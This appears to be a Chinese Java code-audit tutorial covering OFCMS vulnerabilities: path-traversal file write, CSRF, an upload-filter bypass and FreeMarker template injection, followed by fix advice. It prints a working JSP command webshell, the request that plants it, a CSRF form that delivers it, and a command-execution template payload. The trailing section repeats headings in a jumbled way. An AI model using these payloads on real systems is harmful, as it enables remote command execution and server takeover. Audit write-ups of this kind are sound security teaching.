Java代码审计实战教学：OFCMS漏洞分析与利用<\/h1>

一、项目背景与审计准备<\/h2>

审计项目：OFCMS（开源Java CMS系统）
项目地址：https:\/\/gitee.com\/oufu\/ofcms<\/p>

审计工具准备：<\/p>

IDEA集成开发环境<\/li>

FindBugs插件（辅助静态代码分析）<\/li> <\/ul>

二、漏洞1：后台任意文件上传<\/h2>

漏洞位置<\/h3>
`\/ofcms\/ofcms-admin\/src\/main\/java\/com\/ofsoft\/cms\/admin\/controller\/cms\/TemplateController.java<\/code><\/p>`

漏洞代码分析<\/h3>
public<\/span> void<\/span> save<\/span>()<\/span> {<\/span>
<\/span><\/span>    String resPath =<\/span> getPara(<\/span>"res_path"<\/span>);<\/span>
<\/span><\/span>    File pathFile =<\/span> null<\/span>;<\/span>
<\/span><\/span>    if<\/span> (<\/span>"res"<\/span>.<\/span>equals<\/span>(<\/span>resPath)){<\/span>
<\/span><\/span>        pathFile =<\/span> new<\/span> File(<\/span>SystemUtile.<\/span>getSiteTemplateResourcePath<\/span>());<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        pathFile =<\/span> new<\/span> File(<\/span>SystemUtile.<\/span>getSiteTemplatePath<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    String dirName =<\/span> getPara(<\/span>"dirs"<\/span>);<\/span>
<\/span><\/span>    if<\/span> (<\/span>dirName !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        pathFile =<\/span> new<\/span> File(<\/span>pathFile,<\/span> dirName);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    String fileName =<\/span> getPara(<\/span>"file_name"<\/span>);<\/span>
<\/span><\/span>    String fileContent =<\/span> getRequest().<\/span>getParameter<\/span>(<\/span>"file_content"<\/span>);<\/span>
<\/span><\/span>    fileContent =<\/span> fileContent.<\/span>replace<\/span>(<\/span>"&lt;"<\/span>,<\/span> "<"<\/span>).<\/span>replace<\/span>(<\/span>"&gt;"<\/span>,<\/span> ">"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    File file =<\/span> new<\/span> File(<\/span>pathFile,<\/span> fileName);<\/span>
<\/span><\/span>    FileUtils.<\/span>writeString<\/span>(<\/span>file,<\/span> fileContent);<\/span>
<\/span><\/span>    rendSuccessJson();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞特征<\/h3>

无任何过滤<\/strong>：直接接收用户输入的file_name<\/code>和file_content<\/code>参数<\/li>
路径遍历<\/strong>：可通过..\/..\/<\/code>实现目录穿越<\/li>
JSP代码写入<\/strong>：直接将内容写入文件，无任何安全限制<\/li>
<\/ol>
利用条件<\/h3>

需要后台管理员权限<\/li>
可结合CSRF漏洞进行利用<\/li>
<\/ul>
利用方式<\/h3>
HTTP请求示例<\/strong>：<\/p>
POST<\/span> \/ofcms_admin_war\/admin\/cms\/template\/save.json HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> localhost:8080<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span>
<\/span><\/span>Content-Length:<\/span> 548<\/span>
<\/span><\/span>
<\/span><\/span>file_path=&dirs=%2F&res_path=res&file_name=..\/..\/static\/jsp_shell.jsp&file_content=%3C%25%0A++++if(%22p0desta%22.equals(request.getParameter(%22pwd%22)))%7B%0A++++++++java.io.InputStream+in+%3D+Runtime.getRuntime().exec(request.getParameter(%22i%22)).getInputStream()%3B%0A++++++++int+a+%3D+-1%3B%0A++++++++byte%5B%5D+b+%3D+new+byte%5B2048%5D%3B%0A++++++++out.print(%22%3Cpre%3E%22)%3B%0A++++++++while((a%3Din.read(b))!%3D-1)%7B%0A+out.println(new+String(b))%3B%0A+7D%0A++++++++out.print(%22%3C%2Fpre%3E%22)%3B%0A++++%7D%0A%25%3E
<\/span><\/span><\/code><\/pre>写入的JSP Webshell<\/strong>：<\/p>
<%
    if("p0desta".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("<\/pre>");
    }
%>
<\/code><\/pre>
绕过机制<\/h3>
为什么需要写入static目录<\/strong>：<\/p>
public<\/span> class<\/span> ActionHandler<\/span> extends<\/span> Handler {<\/span>
<\/span><\/span>    private<\/span> String[]<\/span> suffix =<\/span> {<\/span>".html"<\/span>,<\/span> ".jsp"<\/span>,<\/span> ".json"<\/span>};<\/span>
<\/span><\/span>    public<\/span> static<\/span> final<\/span> String exclusions =<\/span> "static\/"<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> handle<\/span>(<\/span>String target,<\/span> HttpServletRequest request,<\/span> 
<\/span><\/span>                      HttpServletResponse response,<\/span> boolean<\/span>[]<\/span> isHandled)<\/span> {<\/span>
<\/span><\/span>        \/\/ 过滤静态文件
<\/span><\/span><\/span><\/span>        if<\/span> (<\/span>target.<\/span>contains<\/span>(<\/span>exclusions)){<\/span>
<\/span><\/span>            return<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        \/\/ 其他处理...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
系统对.jsp<\/code>、.html<\/code>、.json<\/code>后缀的请求会进行处理<\/li>
但static\/<\/code>目录下的文件会被直接放行，不进行后缀检查<\/li>
<\/ul>
三、漏洞2：CSRF漏洞<\/h2>
漏洞特征<\/h3>

所有后台操作均未设置CSRF Token<\/li>
可构造恶意页面诱导管理员执行操作<\/li>
<\/ul>
CSRF攻击示例<\/h3>
<html<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><script<\/span>>history<\/span>.pushState<\/span>(''<\/span>, ''<\/span>, '\/'<\/span>)<\/script<\/span>>
<\/span><\/span><form<\/span> action<\/span>=<\/span>"http:\/\/localhost:8080\/ofcms_admin_war\/admin\/cms\/template\/save.json"<\/span> method<\/span>=<\/span>"POST"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"file_path"<\/span> value<\/span>=<\/span>""<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"dirs"<\/span> value<\/span>=<\/span>"\/"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"res_path"<\/span> value<\/span>=<\/span>"res"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"file_name"<\/span> value<\/span>=<\/span>"..\/..\/static\/shell2.jsp"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"file_content"<\/span> value<\/span>=<\/span>"&lt;% if(&quot;p0desta&quot;.equals(request.getParameter(&quot;pwd&quot;))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(&quot;i&quot;)).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(&quot;&lt;pre&gt;&quot;); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(&quot;&lt;\/pre&gt;&quot;); } %&gt;"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"submit"<\/span> value<\/span>=<\/span>"Submit request"<\/span> \/>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>四、漏洞3：鸡肋的文件上传漏洞<\/h2>
漏洞位置<\/h3>
同文件上传功能，但限制更严格<\/p>
安全限制代码<\/h3>
private<\/span> boolean<\/span> isSafeFile<\/span>(<\/span>UploadFile uploadFile)<\/span> {<\/span>
<\/span><\/span>    String fileName =<\/span> uploadFile.<\/span>getFileName<\/span>().<\/span>trim<\/span>().<\/span>toLowerCase<\/span>();<\/span>
<\/span><\/span>    if<\/span> (!<\/span>fileName.<\/span>endsWith<\/span>(<\/span>".jsp"<\/span>)<\/span> &&<\/span> !<\/span>fileName.<\/span>endsWith<\/span>(<\/span>".jspx"<\/span>))<\/span> {<\/span>
<\/span><\/span>        return<\/span> true<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        uploadFile.<\/span>getFile<\/span>().<\/span>delete<\/span>();<\/span>
<\/span><\/span>        return<\/span> false<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>绕过可能性<\/h3>

Windows系统特性：可利用test.jsp.<\/code>或test.jsp <\/code>（末尾空格）绕过<\/li>
但上传路径固定为\/upload\/image\/<\/code>，无法目录穿越，因此实际利用价值低<\/li>
<\/ul>
五、漏洞4：服务端模板注入(FreeMarker)<\/h2>
漏洞背景<\/h3>
系统使用FreeMarker作为模板引擎<\/p>
利用方式<\/h3>
<<\/span>#<\/span>assign ex=<\/span>"freemarker.template.utility.Execute"<\/span>?<\/span>new<\/span>()><\/span> ${<\/span> ex(<\/span>"id"<\/span>)<\/span> }<\/span>
<\/span><\/span><\/code><\/pre>攻击效果<\/h3>

直接执行系统命令<\/li>
可获取服务器权限<\/li>
<\/ul>
六、修复建议<\/h2>


文件上传漏洞<\/strong>：<\/p>

限制上传文件类型白名单<\/li>
禁止使用用户输入直接构造文件路径<\/li>
对上传文件内容进行安全检查<\/li>
<\/ul>
<\/li>

CSRF漏洞<\/strong>：<\/p>

添加CSRF Token机制<\/li>
关键操作使用POST请求<\/li>
<\/ul>
<\/li>

模板注入<\/strong>：<\/p>

升级FreeMarker版本<\/li>
禁用危险的内建函数<\/li>
使用沙盒环境<\/li>
<\/ul>
<\/li>

其他<\/strong>：<\/p>

实施严格的权限控制<\/li>
对用户输入进行严格过滤和校验<\/li>
定期进行安全审计和代码审查<\/li>
<\/ul>
<\/li>
<\/ol>
七、总结<\/h2>
本次审计发现的漏洞链：<\/p>

通过CSRF漏洞诱导管理员执行操作<\/li>
利用任意文件上传写入Webshell<\/li>
通过static目录绕过安全限制<\/li>
最终获取服务器控制权限<\/li>
<\/ol>
这些漏洞组合利用可导致系统完全沦陷，需引起高度重视并及时修复。<\/p>

Java代码审计实战教学：OFCMS漏洞分析与利用<\/h1>

二、漏洞1：后台任意文件上传<\/h2>

漏洞位置<\/h3> \/ofcms\/ofcms-admin\/src\/main\/java\/com\/ofsoft\/cms\/admin\/controller\/cms\/TemplateController.java<\/code><\/p>

三、漏洞2：CSRF漏洞<\/h2>

四、漏洞3：鸡肋的文件上传漏洞<\/h2>

漏洞位置<\/h3> 同文件上传功能，但限制更严格<\/p>

五、漏洞4：服务端模板注入(FreeMarker)<\/h2>

漏洞背景<\/h3> 系统使用FreeMarker作为模板引擎<\/p>

漏洞位置<\/h3>
`\/ofcms\/ofcms-admin\/src\/main\/java\/com\/ofsoft\/cms\/admin\/controller\/cms\/TemplateController.java<\/code><\/p>`

漏洞位置<\/h3>
同文件上传功能，但限制更严格<\/p>

漏洞背景<\/h3>
系统使用FreeMarker作为模板引擎<\/p>